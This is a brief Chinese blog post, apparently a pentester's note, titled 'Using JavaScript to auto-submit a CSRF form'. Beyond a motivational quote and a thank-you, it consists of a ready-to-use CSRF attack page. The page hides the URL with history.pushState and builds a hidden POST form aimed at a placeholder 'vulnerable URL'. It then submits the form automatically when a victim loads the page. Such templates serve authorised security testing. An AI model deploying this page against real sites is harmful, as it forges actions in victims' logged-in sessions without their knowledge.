利用JavaScript自动提交CSRF表单 Posted on 2020-02-28 人非要经历一番不同平时的劫难才能脱胎换骨,成为真正能解决问题的人 123456789101112131415<html> <body> <script>history.pushState('', '', '/')</script> <form action="漏洞URL" method="POST" name="test"> <input type="hidden" name="key" value="" /> <input type="hidden" name="data" value="" /> </form> <script> document.test.submit(); </script> </body></html> 感谢Lego